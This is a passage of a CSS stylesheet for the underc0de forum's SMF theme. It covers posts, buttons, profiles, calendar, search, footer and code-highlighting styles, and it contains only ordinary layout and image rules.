}
.postarea, .moderatorbar
{
margin: 0 0 0 16em;
}
.postarea div.flow_hidden
{
width: 100%;
}

.moderatorbar
{
clear: right;
}
/* poster details and list of items */
.poster h4, .poster ul
{
padding: 0;
margin: 0 1em 0 1.5em;
}
.poster h4
{
margin: 0.2em 0 0.4em 1.1em;
font-size: 120%;
}
.poster h4, .poster h4 a
{
color: #fff;
}
.poster ul ul
{
margin: 0.3em 1em 0 0;
padding: 0;
}
.poster ul ul li
{
display: inline;
}
.poster li.stars, .poster li.avatar, .poster li.blurb, li.postcount, li.im_icons ul
{
margin-top: 0.5em;
}
.poster li.avatar
{
overflow: hidden;
}
.poster li.warning
{
line-height: 1.2em;
padding-top: 1em;
}
.poster li.warning a img
{
vertical-align: bottom;
padding: 0 0.2em;
}
.messageicon
{
float: left;
margin: 0 0.5em 0 0;
}
.messageicon img
{
padding: 6px 3px;
}
.keyinfo
{
float: left;
width: 50%;
}
.modifybutton
{
clear: right;
float: right;
margin: 6px 20px 10px 0;
text-align: right;
font: bold 0.85em arial, sans-serif;
color: #334466;
}

/* The quick buttons */
div.quickbuttons_wrap
{
padding: 0.2em 0;
width: 100%;
float: left;
}

ul.quickbuttons
{
margin: 0.9em 11px 0 0;
clear: right;
float: right;
text-align: right;
font: bold 0.85em arial, sans-serif;
}
ul.quickbuttons li
{
float: left;
display: inline;
margin: 0 0 0 11px;
}
ul.quickbuttons li a
{
padding: 0 0 0 20px;
display: block;
height: 20px;
line-height: 18px;
float: left;
}
ul.quickbuttons a:hover
{
}
ul.quickbuttons li.quote_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 0;
}
ul.quickbuttons li.remove_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -30px;
}
ul.quickbuttons li.modify_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -60px;
}
ul.quickbuttons li.approve_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -90px;
}
ul.quickbuttons li.restore_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -120px;
}
ul.quickbuttons li.split_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -150px;
}
ul.quickbuttons li.reply_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -180px;
}
ul.quickbuttons li.reply_all_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -180px;
}
ul.quickbuttons li.notify_button
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quickbuttons.png) no-repeat 0 -210px;
}
ul.quickbuttons li.inline_mod_check
{
margin: 0 0 0 5px;
}

.post
{
margin-top: 0.5em;
clear: right;
}
.inner
{
padding: 1em 1em 2px 0;
margin: 0 1em 0 0;
border-top: 1px solid #494949;
}
img.smiley
{
vertical-align: bottom;
}
#forumposts .modified
{
float: left;
}
#forumposts .reportlinks
{
margin-right: 1.5em;
text-align: right;
clear: right;
}
#forumposts .signature, .post .signature
{
margin: 1em 0 0 0;
}
#forumposts span.botslice
{
clear: both;
}
.attachments hr
{
clear: both;
margin: 1em 0 1em 0;
}
.attachments
{
padding: 1em 0 2em 0;
}
.attachments div
{
padding: 0 0.5em;
}

/* Styles for the quick reply area.
---------------------------------------------------- */

#quickreplybox
{
padding-bottom: 1px;
}
#quickReplyOptions .roundframe
{
padding: 0 10%;
}
#quickReplyOptions form textarea
{
height: 100px;
width: 635px;
max-width: 100%;
min-width: 100%;
margin: 0.25em 0 1em 0;
}
/* The jump to box */
#display_jump_to
{
clear: both;
padding: 5px;
margin-top: 6px;
text-align: right;
}

/* Separator of posts. More useful in the print stylesheet. */
#forumposts .post_separator
{
display: none;
}

/* Styles for edit post section
---------------------------------------------------- */
form#postmodify .roundframe
{
padding: 0 12%;
}
#post_header, .postbox
{
padding: 0.5em;
overflow: hidden;
}
#post_header dt, .postbox dt
{
float: left;
padding: 0;
width: 15%;
margin: .5em 0 0 0;
font-weight: bold;
}
#post_header dd, .postbox dd
{
float: left;
padding: 0;
width: 83%;
margin: .3em 0;
}
#post_header img
{
vertical-align: middle;
}
ul.post_options
{
margin: 0 0 0 1em;
padding: 0;
list-style: none;
overflow: hidden;
}
ul.post_options li
{
margin: 0.2em 0;
width: 49%;
float: left;
}
#postAdditionalOptionsHeader
{
margin-top: 1em;
}
#postMoreOptions
{
border-bottom: 1px solid #494949;
padding: 0.5em;
}
#postAttachment, #postAttachment2
{
overflow: hidden;
margin: .5em 0;
padding: 0;
border-bottom: 1px solid #494949;
padding: 0.5em;
}
#postAttachment dd, #postAttachment2 dd
{
margin: .3em 0 .3em 1em;
}
#postAttachment dt, #postAttachment2 dt
{
font-weight: bold;
}
#postAttachment3
{
margin-left: 1em;
}
#post_confirm_strip, #shortcuts
{
padding: 1em 0 0 0;
}
.post_verification
{
margin-top: .5em;
}
.post_verification #verification_control
{
margin: .3em 0 .3em 1em;
}
/* The BBC buttons */
#bbcBox_message
{
margin: 0.75em 0.5em;
}
#bbcBox_message div
{
margin: 0.2em 0;
vertical-align: top;
}
#bbcBox_message div img
{
margin: 0 1px 0 0;
vertical-align: top;
}
#bbcBox_message select
{
margin: 0 2px;
}
/* The smiley strip */
#smileyBox_message
{
margin: 0.5em;
}

/* Styles for edit event section
---------------------------------------------------- */
#post_event .roundframe
{
padding: 0 12%;
}
#post_event fieldset
{
padding: 0.5em;
clear: both;
}
#post_event #event_main input
{
margin: 0 0 1em 0;
float: left;
}
#post_event #event_main div.smalltext
{
width: 33em;
float: right;
}
#post_event div.event_options
{
float: right;
}
#post_event ul.event_main, ul.event_options
{
padding: 0;
overflow: hidden;
}
#post_event ul.event_main li
{
list-style-type: none;
margin: 0.2em 0;
width: 49%;
float: left;
}
#post_event ul.event_options
{
margin: 0;
padding: 0 0 .7em .7em;
}
#post_event ul.event_options li
{
list-style-type: none;
margin: 0;
float: left;
}
#post_event #event_main select, #post_event ul.event_options li select, #post_event ul.event_options li .input_check
{
margin: 0 1em 0 0;
}

/* Styles for edit poll section.
---------------------------------------------------- */

#edit_poll
{
overflow: hidden;
}
#edit_poll fieldset
{
padding: 0.5em;
clear: both;
overflow: hidden;
}
#edit_poll fieldset input
{
margin-left: 8.1em;
}
#edit_poll ul.poll_main li
{
padding-left: 1em;
}
#edit_poll ul.poll_main input
{
margin-left: 1em;
}
#edit_poll ul.poll_main, dl.poll_options
{
overflow: hidden;
padding: 0 0 .7em .7em;
list-style: none;
}
#edit_poll ul.poll_main li
{
margin: 0.2em 0;
}
#edit_poll dl.poll_options dt
{
width: 33%;
padding: 0 0 0 1em;
}
#edit_poll dl.poll_options dd
{
width: 65%;
}
#edit_poll dl.poll_options dd input
{
margin-left: 0;
}

/* Styles for the recent messages section.
---------------------------------------------------- */

#readbuttons_top .pagelinks, #readbuttons .pagelinks
{
padding-bottom: 1em;
width: 60%;
}
#readbuttons .pagelinks
{
padding-top: 1em;
}
#recent
{
clear: both;
}

/* Styles for the move topic section.
---------------------------------------------------- */

#move_topic dl
{
margin-bottom: 0;
}
#move_topic dl.settings dt
{
width: 40%;
}
#move_topic dl.settings dd
{
width: 59%;
}
.move_topic
{
width: 710px;
margin: auto;
text-align: left;
}
div.move_topic fieldset
{
padding: 0.5em;
}

/* Styles for the send topic section.
---------------------------------------------------- */

fieldset.send_topic
{
border: none;
padding: 0.5em;
}
dl.send_topic
{
margin-bottom: 0;
}
dl.send_mail dt
{
width: 35%;
}
dl.send_mail dd
{
width: 64%;
}

/* Styles for the report topic section.
---------------------------------------------------- */

#report_topic dl
{
margin-bottom: 0;
}
#report_topic dl.settings dt
{
width: 20%;
}
#report_topic dl.settings dd
{
width: 79%;
}

/* Styles for the split topic section.
---------------------------------------------------- */

div#selected, div#not_selected
{
width: 49%;
}
ul.split_messages li.windowbg, ul.split_messages li.windowbg2
{
margin: 1px;
}
ul.split_messages li a.split_icon
{
padding: 0 0.5em;
}
ul.split_messages div.post
{
padding: 1em 0 0 0;
border-top: 1px solid #494949;
}

/* Styles for the merge topic section.
---------------------------------------------------- */
ul.merge_topics li
{
list-style-type: none;
}
dl.merge_topic dt
{
width: 25%;
}
dl.merge_topic dd
{
width: 74%;
}
fieldset.merge_options
{
clear: both;
}
.custom_subject
{
margin: 0.5em 0;
}

/* Styles for the login areas.
------------------------------------------------------- */
.login
{
width: 540px;
margin: 0 auto;
}
.login dl
{
overflow: auto;
clear: right;
}
.login dt, .login dd
{
margin: 0 0 0.4em 0;
width: 44%;
padding: 0.1em;
}
.login dt
{
float: left;
clear: both;
text-align: right;
font-weight: bold;
}
.login dd
{
width: 54%;
float: right;
text-align: left;
}
.login p
{
text-align: center;
}

/* Styles for the registration section.
------------------------------------------------------- */
.register_error
{
border: 1px dashed red;
padding: 5px;
margin: 0 1ex 1ex 1ex;
}
.register_error span
{
text-decoration: underline;
}

/* Additional profile fields */
dl.register_form
{
margin: 0;
clear: right;
}

dl.register_form dt
{
font-weight: normal;
float: left;
clear: both;
width: 50%;
margin: 0.5em 0 0 0;
}

dl.register_form dt strong
{
font-weight: bold;
}

dl.register_form dt span
{
display: block;
}

dl.register_form dd
{
float: left;
width: 49%;
margin: 0.5em 0 0 0;
}

#confirm_buttons
{
text-align: center;
padding: 1em 0;
}

.coppa_contact
{
padding: 4px;
width: 32ex;
background-color: #fff;
color: #000;
margin-left: 5ex;
border: 1px solid #000;
}

.valid_input
{
background-color: #f5fff0;
}
.invalid_input
{
background-color: #fff0f0;
}

/* Styles for maintenance mode.
------------------------------------------------------- */
#maintenance_mode
{
width: 75%;
min-width: 520px;
text-align: left;
}
#maintenance_mode img.floatleft
{
margin-right: 1em;
}

/* common for all admin sections */
h3.titlebg img
{
vertical-align: middle;
margin-right: 0.5em;
margin-top: -1px;
}
tr.titlebg td
{
padding-left: 0.7em;
}
#admin_menu
{
min-height: 2em;
padding-left: 0;
}
#admin_content
{
clear: left;
padding-top: 0.5em;
}
/* Custom profile fields like to play with us some times. */
#admin_content .custom_field
{
margin-bottom: 15px;
}
#admin_login .centertext
{
padding: 1em;
}
#admin_login .centertext .error
{
padding: 0 0 1em 0;
}

/* Styles for sidebar menus.
------------------------------------------------------- */
.left_admmenu, .left_admmenu ul, .left_admmenu li
{
padding: 0;
margin: 0;
list-style: none;
}
#left_admsection
{
width: 160px;
float: left;
padding-right: 10px;
}
.adm_section h4.titlebg
{
font-size: 95%;
margin-bottom: 5px;
}
#main_container
{
position: relative;
}
.left_admmenu li
{
padding: 0 0 0 0.5em;
}
.left_admmenu
{
margin-bottom: 0.5em;
}
#main_admsection
{
position: relative;
left: 0;
right: 0;
overflow: hidden;
}
tr.windowbg td, tr.windowbg2 td, tr.approvebg td, tr.highlight2 td
{
padding: 8px;
background-color: #151515;
}
#credits p
{
padding: 0;
font-style: italic;
margin: 0;
}

/* Styles for generic tables.
------------------------------------------------------- */
.topic_table table
{
width: 100%;
}
.topic_table .icon1, .topic_table .icon2, .topic_table .stats
{
text-align: center;
}
#topic_icons
{
margin: 1em 0 0 0;
}
#topic_icons .description
{
margin: 0;
}
.topic_table table thead
{
border-bottom: 1px solid #252525;
}
/* the subject column */
.topic_table td
{
font-size: 1em;
}
.topic_table td.subject p, .topic_table td.stats
{
margin: 0;
}
.topic_table td.lastpost
{
}
.topic_table td.stickybg2
{
background-image: url(https://underc0de.org/foro/Themes/underc0de/images/icons/quick_sticky.png);
background-repeat: no-repeat;
background-position: 98% 8px;
}
.topic_table td.lockedbg2
{
background-image: url(https://underc0de.org/foro/Themes/underc0de/images/icons/quick_lock.png);
background-repeat: no-repeat;
background-position: 98% 8px;
}
.topic_table td.locked_sticky2
{
background-image: url(https://underc0de.org/foro/Themes/underc0de/images/icons/quick_sticky.png);
background-repeat: no-repeat;
background-position: 98% 8px;
}
.topic_table td.stats
{
background-image: none;
}

/* Styles for (fatal) errors.
------------------------------------------------- */

#fatal_error
{
width: 80%;
margin: auto;
}

.errorbox
{
padding: 1em;
border: 1px solid #cc3344;
color: #000;
background-color: #ffe4e9;
margin-bottom: 1em;
}
.errorbox h3
{
padding: 0;
margin: 0;
font-size: 1.1em;
text-decoration: underline;
}
.errorbox p
{
margin: 1em 0 0 0;
}
.errorbox p.alert
{
padding: 0;
margin: 0;
float: left;
width: 1em;
font-size: 1.5em;
}

/* Styles for the profile section.
------------------------------------------------- */

dl
{
overflow: auto;
margin: 0;
padding: 0;
}

/* The basic user info on the left */
#basicinfo
{
width: 20%;
float: left;
}
#basicinfo .windowbg .content
{
padding-left: 20px;
}
#detailedinfo
{
width: 79.5%;
float: right;
}
#basicinfo h4
{
font-size: 135%;
font-weight: 100;
line-height: 105%;
white-space: pre-wrap;
overflow: hidden;
}
#basicinfo h4 span.position
{
font-size: 80%;
font-weight: 100;
display: block;
}
#basicinfo img.avatar
{
display: block;
margin: 10px 0 0 0;
}
#basicinfo ul
{
list-style-type: none;
margin: 10px 0 0 0;
}
#basicinfo ul li
{
display: block;
float: left;
margin-right: 5px;
height: 20px;
}
#basicinfo span#userstatus
{
display: block;
clear: both;
}
#basicinfo span#userstatus img
{
vertical-align: middle;
}
#detailedinfo div.content dl, #tracking div.content dl
{
clear: right;
overflow: auto;
margin: 0 0 18px 0;
padding: 0 0 15px 0;
border-bottom: 1px #494949 solid;
}
#detailedinfo div.content dt, #tracking div.content dt
{
width: 35%;
float: left;
margin: 0 0 3px 0;
padding: 0;
font-weight: bold;
clear: both;
}
#detailedinfo div.content dd, #tracking div.content dd
{
width: 65%;
float: left;
margin: 0 0 3px 0;
padding: 0;
}
#detailedinfo div.content dl.noborder
{
border-bottom: 0;
}
#detailedinfo div.content dt.clear
{
width: 100%;
}
.signature, .custom_fields_above_signature
{
border-top: 1px #494949 solid;
}
.signature h5
{
font-size: 0.85em;
margin-bottom: 10px;
}
#personal_picture
{
display: block;
margin-bottom: 0.3em;
}
#avatar_server_stored div
{
float: left;
}
#avatar_upload
{
overflow: auto;
}
#main_admsection #basicinfo, #main_admsection #detailedinfo
{
width: 100%;
}
#main_admsection #basicinfo h4
{
float: left;
width: 35%;
}
#main_admsection #basicinfo img.avatar
{
float: right;
vertical-align: top;
}
#main_admsection #basicinfo ul
{
clear: left;
}
#main_admsection #basicinfo span#userstatus
{
clear: left;
}
#main_admsection #basicinfo p#infolinks
{
display: none;
clear: both;
}
#main_admsection #basicinfo .botslice
{
clear: both;
}

/* Simple feedback messages */
div#profile_error, div#profile_success
{
margin: 0 0 1em 0;
padding: 1em 2em;
border: 1px solid;
}
div#profile_error
{
border-color: red;
color: red;
background: #fee;
}

div#profile_error span
{
text-decoration: underline;
}

div#profile_success
{
border-color: green;
color: green;
background: #efe;
}

/* Profile statistics */
#generalstats div.content dt
{
width: 50%;
float: left;
margin: 0 0 3px 0;
padding: 0;
font-weight: bold;
clear: both;
}
#generalstats div.content dd
{
width: 50%;
float: left;
margin: 0 0 3px 0;
padding: 0;
}

/* Activity by time */
#activitytime
{
margin: 6px 0;
}
.activity_stats
{
margin: 0;
padding: 0;
list-style: none;
}
.activity_stats li
{
margin: 0;
padding: 0;
width: 4.16%;
float: left;
}
.activity_stats li span
{
display: block;
border: solid #494949;
border-width: 1px 1px 0 0;
text-align: center;
}
.activity_stats li.last span
{
border-right: none;
}
.activity_stats li div.bar
{
margin: 0 auto;
width: 15px;
}
.activity_stats li div.bar div
{
background: #6294CE;
}
.activity_stats li div.bar span
{
position: absolute;
top: -1000em;
left: -1000em;
}

/* Most popular boards by posts and activity */
#popularposts
{
width: 49.5%;
float: left;
}
#popularactivity
{
width: 49.5%;
float: right;
}

#popularposts div.content dt, #popularactivity div.content dt
{
width: 65%;
float: left;
margin: 0 0 3px 0;
padding: 0;
font-weight: bold;
clear: both;
}
#popularposts div.content dd, #popularactivity div.content dd
{
width: 35%;
float: left;
margin: 0 0 3px 0;
padding: 0;
}

.profile_pie
{
background-image: url(https://underc0de.org/foro/Themes/underc0de/images/stats_pie.png);
float: left;
height: 20px;
width: 20px;
margin: 0 1em 0 0;
padding: 0;
text-indent: -1000em;
}

/* View posts */
.topic .time
{
float: right;
}

.counter
{
margin: 0 0 0 0;
padding: 0.2em 0.5em 0.1em 0.2em;
font-size: 2.2em;
font-weight: bold;
color: #3f3f3f;
float: left;
}
.list_posts
{
border-top: 2px solid #666;
padding-top: 12px;
margin-top: 6px;
overflow: auto;
}

.core_posts
{
margin-bottom: 3px;
}

.topic h4
{
margin: 3px 0;
}

.topic .post
{
margin: 0 1em;
min-height: 80px;
height: auto !important;
height: 80px;
}

.topic .mod_icons
{
text-align: right;
margin-right: 1em;
}

#tracking div.content dl
{
border-bottom: 0;
margin: 0;
padding: 0;
}

#creator dl
{
margin: 0;
}
#creator dt
{
width: 40%;
float: left;
clear: both;
margin: 0 0 10px 0;
}
#creator dd
{
float: right;
width: 55%;
margin: 0 0 10px 2px;
overflow: auto;
}
.ignoreboards
{
margin: 0 2%;
padding: 0;
width: 45%;
}
.ignoreboards a
{
font-weight: bold;
border-bottom: 1px solid #c4c4c4;
padding: 0.1em 0;
}
.ignoreboards a:hover
{
text-decoration: none;
border-bottom: 1px solid #334466;
}
.ignoreboards ul
{
margin: 0;
padding: 0;
}
.ignoreboards li
{
list-style: none;
float: left;
clear: both;
}
.ignoreboards li.category
{
margin: 0.7em 0 0 0;
width: 100%;
}
.ignoreboards li ul
{
margin: 0.2em 0 0 0;
}
.ignoreboards li.category ul li.board
{
width: 93%;
}

#theme_settings
{
overflow: auto;
margin: 0;
padding: 0;
}

#theme_settings li
{
list-style: none;
margin: 10px 0;
padding: 0;
}
/* Paid Subscriptions */
#paid_subscription
{
width: 100%;
}
#paid_subscription dl.settings
{
margin-bottom: 0;
}
#paid_subscription dl.settings dd, #paid_subscription dl.settings dt
{
margin-bottom: 4px;
}
/* Pick theme */
#pick_theme
{
width: 100%;
float: left;
}
/*Issue a warning*/
#warn_body{
width: 80%;
font-size: 0.9em;
}

/* Styles for the statistics center.
------------------------------------------------- */
#statistics
{
padding: 0.5em 0;
}
#statistics div.title_bar
{
margin: 4px 0 -2px 0;
}
#statistics h3.catbg
{
text-align: center;
}
#statistics div.content
{
min-height: 210px;
}
#statistics div.top_row
{
min-height: 150px;
}
#stats_left, #top_posters, #top_topics_replies, #top_topics_starter
{
float: left;
width: 49.5%;
}
#stats_right, #top_boards, #top_topics_views, #most_online
{
float: right;
width: 49.5%;
}
dl.stats
{
clear: both;
overflow: hidden;
margin: 0;
padding: 0;
}
dl.stats dt
{
width: 49%;
float: left;
margin: 0 0 4px 0;
line-height: 16px;
padding: 0;
clear: both;
font-size: 1em;
}
dl.stats dd
{
text-align: right;
width: 50%;
font-size: 1em;
float: right;
margin: 0 0 4px 0;
line-height: 16px;
padding: 0;
}
.statsbar div.bar
{
float: left;
background: url(https://underc0de.org/foro/Themes/underc0de/images/bar_stats.png) no-repeat;
display: block;
margin: 0 4px;
height: 16px;
}
.statsbar div.bar div
{
position: relative;
right: -4px;
padding: 0 4px 0 0;
background: url(https://underc0de.org/foro/Themes/underc0de/images/bar_stats.png) no-repeat 100%;
height: 16px;
}
tr.windowbg2 th.stats_month
{
width: 25%;
padding: 0 2em;
text-align: left;
}
tr.windowbg2 td.stats_day
{
padding: 0 3.5em;
text-align: left;
}

/* Styles for the personal messages section.
------------------------------------------------- */

#personal_messages h3 span#author, #personal_messages h3 span#topic_title
{
float: left;
}
#personal_messages h3 span#author
{
margin: 0 0 0 0.5em;
}
#personal_messages h3 span#topic_title
{
margin: 0 0 0 9em;
}
#personal_messages div.labels
{
padding: 0 1em 0 0;
}
#personal_messages .capacity_bar
{
background: #f0f4f7;
display: block;
margin: 0.5em 0 0 1em;
height: 1em;
border: 1px solid #adadad;
width: 10em;
}
#personal_messages .capacity_bar span
{
border-right: 1px solid #adadad;
display: block;
height: 1em;
}
#personal_messages .capacity_bar span.empty
{
background: #a6d69d;
}
#personal_messages .capacity_bar span.filled
{
background: #eea800;
}
#personal_messages .capacity_bar span.full
{
background: #f10909;
}
#personal_messages .reportlinks
{
padding: 0.5em 1.3em;
}
#searchLabelsExpand li
{
padding: 0.3em 0.5em;
}
#manrules div.righttext
{
padding: 0.3em 0.1em;
}
dl.addrules dt.floatleft
{
width: 15em;
color: #333;
padding: 0 1.25em 0.5em 1.25em;
}
#addrule fieldset
{
clear: both;
}

/* Styles for the calendar section.
------------------------------------------------- */
.calendar_table
{
margin-bottom: 0.7em;
}

/* Used to indicate the current day in the grid. */
.calendar_today
{
background-color: #414141;
}

#month_grid
{
width: 200px;
text-align: center;
float: left;
}
#month_grid div.cat_bar
{
height: 38px;
}
#month_grid h3.catbg
{
height: 38px;
line-height: 38px;
}
#month_grid table
{
width: 200px;
}
#main_grid table
{
width: 100%;
padding-bottom: 4px;
}
#main_grid table h3.catbg
{
text-align: center;
height: 29px;
border-top: 2px solid #252525;
border-bottom: none;
}
#main_grid table.weeklist td.windowbg
{
text-align: center;
height: 49px;
width: 25px;
font-size: large;
padding: 0 7px;
border-bottom: 2px solid #252525;
}
#main_grid table.weeklist td.weekdays
{
height: 49px;
width: 100%;
padding: 4px;
text-align: left;
vertical-align: middle;
border-bottom: 2px solid #252525;
}
#main_grid h3.weekly
{
text-align: center;
padding-left: 0;
font-size: large;
height: 29px;
}
#main_grid h3 span.floatleft, #main_grid h3 span.floatright
{
display: block;
font-weight: bold;
}
#main_grid table th.days
{
width: 14%;
padding: 4px 0;
}
#main_grid table.weeklist h4.titlebg
{
margin: 0 0 0 0;
height: 23px;
line-height: 27px;
}
#main_grid table td.weeks
{
vertical-align: middle;
text-align: center;
font-weight: bold;
font-size: large;
}
#main_grid table td.days
{
vertical-align: top;
text-align: center;
}

a.modify_event
{
color: red;
}

span.hidelink
{
font-style: italic;
}

#calendar_navigation
{
text-align: center;
}

/* Styles for the memberlist section.
------------------------------------------------- */
#mlist_search
{
margin: auto;
width: 500px;
}

/* Styles for the basic search section.
------------------------------------------------- */
#searchform, #simple_search p
{
padding: 0.5em;
margin: 0;
}
#simple_search, #simple_search p, #advanced_search
{
text-align: center !important;
margin: 0;
}
#search_error
{
font-style: italic;
padding: 0.3em 1em;
}
#search_term_input
{
font-size: 115%;
margin: 0 0 1em;
}

/* Styles for the advanced search section.
------------------------------------------------- */
#searchform fieldset
{
text-align: left;
padding: 0;
border: none;
}
#advanced_search dl#search_options
{
margin: 0 auto;
width: 600px;
padding-top: 1em;
overflow: hidden;
}
#advanced_search dt
{
clear: both;
float: left;
padding: 0.2em;
text-align: right;
width: 20%;
}
#advanced_search dd
{
width: 75%;
float: left;
padding: 0.2em;
margin: 0 0 0 0.5em;
text-align: left;
}
#searchform p.clear
{
clear: both;
}

/* Styles for the search results page.
------------------------------------------------- */
.topic_table td blockquote, .topic_table td .quoteheader
{
margin: 0.5em;
}
.search_results_posts
{
overflow: hidden;
}
.search_results_posts .buttons
{
padding: 5px 1em 0 0;
}

/* Styles for the help section.
------------------------------------------------- */

#help_container
{
margin: 4px 0 0 0;
padding: 0 0 8px 0;
}
#helpmain
{
padding: 0 1em;
}
#helpmain p
{
margin: 0 0 1.5em 0;
line-height: 1.5em;
}
#helpmain ul
{
line-height: 1.5em;
}

/* Styles for print media.
------------------------------------------------------- */
@media print
{
#headerarea
{
display: none;
}

.tborder
{
border: none;
}
}

/* Micolo Styles */

a { outline: none;}
span, p, form { margin: 0; padding: 0;}
#header .wrapper { height: 115px; position: relative;}

#logo a { display: block; background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/logo.png) no-repeat; float: left; width: 400px; height: 75px; text-indent: -9999px; margin-top: 15px;}
#search { float: right; margin-top: 34px; }
#search input.search_input { float: left; background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/search.png) -52px 0 no-repeat; color: #474747; text-shadow: 0 1px 0 #fff; padding: 17px 10px 16px; border: 0; outline: none; width: 168px; height: 16px;}
#search input.search_button { float: left; background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/search.png) 0 0 no-repeat; border: none; width: 52px; height: 55px; cursor: pointer;}
#search input.search_button:hover { background-position: 0 -55px;}

#bg_switcher { position: absolute; right: 15px; top: 18px;}
#bg_switcher a { display: inline-block; width: 11px; height: 11px; text-indent: -9999px; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; overflow: hidden;}
#bg_switcher .teal { background: #355d73;}
#bg_switcher .kaki { background: #556a3e;}
#bg_switcher .brown { background: #6f4f42;}
#bg_switcher .pink { background: #84486f;}

#userbar { background: url(http://i.imgur.com/zQBBFfM.png) repeat-x; height: 74px; color: #888; text-shadow: 0 1px 0 #fff;}
#memb_login { float: left; width: 100%; padding-top: 32px;}
#memb_login ul { margin: 0; padding: 0; line-height: 18px;}
#memb_login li { float: left; list-style: none; padding: 0 6px; border-left: 1px solid #aaa;}
#memb_login .memb_greeting { border-left: none;}
#memb_login a { padding: 0; color: #ffaa00; font-weight: bold;}

#quicknav { float: right; padding-top: 18px;}
#quicknav ul { float: left; margin: 0; padding: 0; line-height: 48px;}

#quicknav li { float: left; padding: 0; list-style: none;}

#quicknav li a { padding-right: 10px; font-weight: bold; color: #484848;}
#quicknav .time { padding-right: 10px;}
#quicknav .social_icon { display: block; background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/social_icons.png) no-repeat; height: 48px; width: 48px; padding: 0;}
#quicknav a.twitter { background-position: 0 0;}
#quicknav a.facebook { background-position: 0 -106px;}
#quicknav a.rss { background-position: 0 -212px;}
#quicknav .twitter:hover { background-position: 0 -53px;}
#quicknav .facebook:hover { background-position: 0 -159px;}
#quicknav .rss:hover { background-position: 0 -265px;}

#toolbar { background-color:#000; height: 60px;}
#topnav, #topnav ul { margin: 0; padding: 0; z-index: 1000;}
#topnav li { float: left; margin: 0; padding: 0; position: relative; list-style: none;}
#topnav li a { display: block; line-height: 60px; padding: 0 10px; color: #787878; text-decoration: none; text-transform: uppercase;}
#topnav li a.active { background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/active.png) 50% 0 no-repeat; font-weight: bold;}
#topnav li a.active, #topnav li a:hover { color: #fff;}
#topnav li:hover > a { color: #FF8000;}
#topnav li ul { position: absolute; width: 200px; top: -999em; left: auto; padding: 5px 0; background: #303030; box-shadow: 1px 2px 5px rgba(0, 0, 0, 0.6); -moz-box-shadow: 0 1px 5px rgba(0, 0, 0, 0.4); -webkit-box-shadow: 1px 2px 5px rgba(0, 0, 0, 0.6);}
#topnav li ul ul { margin: 0;}
#topnav li li { width: 200px; height: auto; padding: 0; margin: 0;}
#topnav li li a { display: block; width: 170px; margin: 0 5px; padding: 0 10px; height: auto; float: none; line-height:30px; text-transform: uppercase;}
#topnav li li a:hover, #topnav ul li:hover > a { background: #262626; -moz-box-shadow: none; -webkit-box-shadow: none; box-shadow: none;}
#topnav li:hover ul { left: 0; top: 55px;}
#topnav li:hover ul ul, #topnav li:hover ul ul ul, #topnav li:hover ul ul ul ul { top: -999em; left: auto;}
#topnav li li:hover ul, #topnav li li li:hover ul, #topnav li li li li:hover ul { left: 200px; top: 0;}
#topnav li.firstlevel { background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/topnav_div.png) 0 50% no-repeat; padding-left: 8px;}
#topnav #button_home { background: none;}

#main_content { padding: 0 0 40px;}
#main_content_inner { background: #111111; padding: 8px 10px 15px; -moz-border-radius: 6px; -webkit-border-radius: 6px; border-radius: 6px; position: relative;}

#modnav { height: 48px; line-height: 48px; text-align: right;}
#modnav strong, #modnav a { margin-right: 8px; color: #fff;}
#modnav span { background: #b3b35a; padding: 2px 6px; font-weight: bold; -moz-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px;}
#modnav a:hover { text-decoration: none; color: #dadada;}

#footer { background: #262626; border-top: 3px solid #212121; border-bottom: 3px solid #212121; padding: 20px 0; margin-bottom: 40px;}
#footer .wrapper { position: relative;}
#footer .smf_copyright { float: left;}
#footer .ds_copyright { float: right; text-align: right;}
.ds_copyright strong {}
#footer p { color: #606060;}
#footer, #footer a { color: #bcbcbc; font-size: 13px; font-family: "Trebuchet MS", "Arial", "Helvetica", sans-serif;}
#footer a:hover { text-decoration: underline;}
#footer li { display: inline; padding-left: 5px;}
#footer li a { font-size: 11px; color: #cccc66;}
#footer .backtop { display: block; position: absolute; bottom: 0; right: 10px; background: url(https://underc0de.org/foro/Themes/underc0de/images/custom/backtop.png) 0 0 no-repeat; height: 15px; width: 15px;}
#footer .backtop:hover { background-position: 0 -20px;}
.clr { clear: both;}

#messageindex tr td { font-size: 11px;}
.lastpost span, .stats span { font-size: 12px;}
.topic_table .lastpost { text-align: right;}
.topic_table .stats { text-align: left;}
.subject_title a { font-size: 15px; color: #eee;}
.cookie_wrap
{
position: fixed;
width: 100%;
bottom: 20px;
text-align: center;
z-index: 9999;
visibility: hidden;
}
.cookie_wrap a:link, .cookie_wrap a:visited
{
text-decoration: none;
}
.cookie_wrap a:hover
{
text-decoration: underline;
cursor: pointer;
}
.cookie_notice
{
display: inline-block;
margin: 0 auto;
padding: 10px;
border-radius: 5px;
font-size: 12px;
}
#cookie_button
{
background: #346;
color: #fff;
font: bold 11px arial;
padding: 3px 12px;
border-radius: 3px;
}

.htagseo_hx {display: inline; color: inherit; border: none; font-size: 1em; font-color: inherit; font-weight: bold; padding: 0px; margin: 0px; }
.geshi {
color: #000000;
background: #ffffff;
font-family: monospace;
font-size: 13px;
line-height: 18px;
border: 1px solid #aaaaaa;
margin: 1px auto 1px auto;
width: 99%;
white-space:normal;
white-space: pre;
white-space: pre-wrap;
white-space: -moz-pre-wrap;
